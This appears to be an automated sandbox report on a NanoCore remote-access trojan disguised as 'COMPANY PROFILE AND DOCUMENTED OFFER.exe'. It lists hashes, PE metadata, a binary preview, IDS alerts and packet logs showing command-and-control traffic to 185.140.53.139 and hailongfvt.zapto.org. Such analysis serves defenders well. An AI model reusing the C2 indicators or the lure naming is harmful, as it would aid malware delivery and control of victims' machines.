SHA-512:	4770B38D61F52AC3EFDE5C3F01E80C9556DABA3B663ED836B421D69BF244048A5468DB5F40374FABCE900201B445C4EC438CE9DDFEC56AF93B6634B0DE0F7042
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........x..tS...............0...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.472589051984974
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	COMPANY PROFILE AND DOCUMENTED OFFER.exe
File size:	520704
MD5:	589f3edcf4bccadde074acc68279cab1
SHA1:	c25f51fb32448d6323344cb2a07771a3908bf682
SHA256:	f22d8de0260841fba148d55ce317ac6a8c27ef46a6ccfb6ad7390eefe3d463bb
SHA512:	4770b38d61f52ac3efde5c3f01e80c9556daba3b663ed836b421d69bf244048a5468db5f40374fabce900201b445c4ec438ce9ddfec56af93b6634b0de0f7042
SSDEEP:	12288:X9ZObojf4hfvrauupl3CE3aXqoFTxWv0wIG6:PObaGeuuphCE3aXqopYvxIG6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7[4`..............P.............N.... ........@.. .......................@............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x47fd4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60345B37 [Tue Feb 23 01:32:39 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7fcfc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0x1000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7dd54	0x7de00	False	0.769855154543	data	7.48398522287	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0x1000	0x1000	False	0.402587890625	data	5.00104802238	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x80090	0x34c	data
RT_MANIFEST	0x803ec	0xc0f	XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	DllImportAttribute.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	RegisterVB
ProductVersion	1.0.0.0
FileDescription	RegisterVB
OriginalFilename	DllImportAttribute.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-08:05:03.763021	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49737	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:11.396505	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49739	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:18.542782	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:27.404115	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:34.009030	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49745	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:38.806186	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49747	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:43.941001	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49748	3365	192.168.2.4	185.140.53.139
02/23/21-08:05:51.479555	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49757	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:00.632376	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49766	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:05.570772	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49767	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:12.698135	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49768	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:19.896467	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49769	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:24.669992	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49770	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:30.667989	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49773	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:39.522382	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:44.697369	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49775	3365	192.168.2.4	185.140.53.139
02/23/21-08:06:51.903108	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49776	3365	192.168.2.4	185.140.53.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:05:03.464538097 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:03.691986084 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:03.692136049 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:03.763020992 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.013252974 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.014693975 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.140037060 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.191706896 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.270272970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.271231890 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.467181921 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.518924952 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.547051907 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.795355082 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875582933 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875617981 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.875766039 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.877470970 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877494097 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877506018 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877518892 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877538919 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877557039 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.877609015 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.877630949 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.880585909 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.885013103 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:04.887480974 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:04.959489107 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080483913 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080521107 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080585003 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080602884 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080600977 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080634117 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080647945 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.080684900 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.080734968 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.087686062 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.087714911 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.087807894 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.089036942 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.089127064 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.089201927 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.090498924 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.090585947 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.090980053 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.091140985 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.091161013 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.091203928 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.091229916 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092380047 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092427969 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092456102 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.092468977 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092485905 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.092499018 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.093457937 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.093478918 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.093523979 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.093544960 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.094048977 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.094121933 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.094228983 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.094279051 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.096194983 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.096275091 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.205127954 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.295584917 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296487093 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296525002 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.296572924 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297065973 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297141075 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297440052 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297486067 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297524929 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297550917 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.297560930 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.297605038 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.300390959 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.300493956 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.300546885 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.311549902 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.311610937 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.311672926 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.312277079 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.312319040 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.312360048 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.313178062 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.313220024 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.313266993 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.314224005 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.314265013 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.314409018 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.327245951 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327297926 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327336073 CET	3365	49737	185.140.53.139	192.168.2.4
Feb 23, 2021 08:05:05.327352047 CET	49737	3365	192.168.2.4	185.140.53.139
Feb 23, 2021 08:05:05.327377081 CET	3365	49737	185.140.53.139	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 08:04:41.195267916 CET	59123	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:41.256730080 CET	53	59123	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:42.509239912 CET	54531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:42.561167002 CET	53	54531	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:43.338033915 CET	49714	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:43.396691084 CET	53	49714	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:43.439785957 CET	58028	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:43.497088909 CET	53	58028	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:44.821852922 CET	53097	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:44.873518944 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:46.480695963 CET	49257	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:46.529553890 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:47.630599976 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:47.682384968 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:48.922032118 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:48.971003056 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:49.914119959 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:49.965656996 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:51.295715094 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:51.347246885 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:52.283457041 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:52.332087994 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:53.550250053 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:53.609714031 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:54.528877020 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:54.580415010 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:55.743685961 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:55.795187950 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:57.245246887 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:57.302469015 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:58.682540894 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:58.731172085 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 08:04:59.876025915 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:04:59.927695036 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:02.520519018 CET	56621	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:02.569204092 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:03.394757032 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:03.453761101 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:05.471314907 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:05.522981882 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:11.087408066 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:11.147933960 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:15.607594013 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:15.656356096 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:18.286993980 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:18.338680983 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:23.629424095 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:23.689316034 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:27.322935104 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:27.384254932 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:33.698035002 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:33.755517006 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:36.045073986 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:36.104753971 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:38.525880098 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:38.583254099 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:43.667853117 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:43.728954077 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:46.936856985 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:47.008913994 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:47.624486923 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:47.684530020 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:48.317285061 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:48.366059065 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:48.810966969 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:48.867979050 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:49.130503893 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:49.202219009 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:49.402358055 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:49.474764109 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:50.065048933 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:50.128010988 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:50.780194998 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:50.837344885 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:51.198170900 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:51.256272078 CET	53	59794	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:51.664412022 CET	55916	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:51.721954107 CET	53	55916	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:52.639295101 CET	52752	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:52.700978041 CET	53	52752	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:53.391177893 CET	60542	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:53.448240995 CET	53	60542	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:55.640450954 CET	60689	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:55.698538065 CET	53	60689	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:58.879259109 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:00.162163019 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:00.224046946 CET	53	64206	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:05.252437115 CET	50904	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:05.311299086 CET	53	50904	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:12.445050955 CET	57525	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:12.502271891 CET	53	57525	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:19.625576973 CET	53814	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:19.688391924 CET	53	53814	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:24.408164978 CET	53418	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:24.466933966 CET	53	53418	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:26.392512083 CET	62833	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:26.443986893 CET	53	62833	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:29.078402042 CET	59260	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:29.152302027 CET	53	59260	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:30.400244951 CET	49944	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:30.457842112 CET	53	49944	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:39.258706093 CET	63300	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:39.310410976 CET	53	63300	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:44.260832071 CET	61449	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:44.322439909 CET	53	61449	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:51.366480112 CET	51275	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:51.427912951 CET	53	51275	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 08:05:03.394757032 CET	192.168.2.4	8.8.8.8	0x53b8	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:11.087408066 CET	192.168.2.4	8.8.8.8	0x4403	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:18.286993980 CET	192.168.2.4	8.8.8.8	0x57a4	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
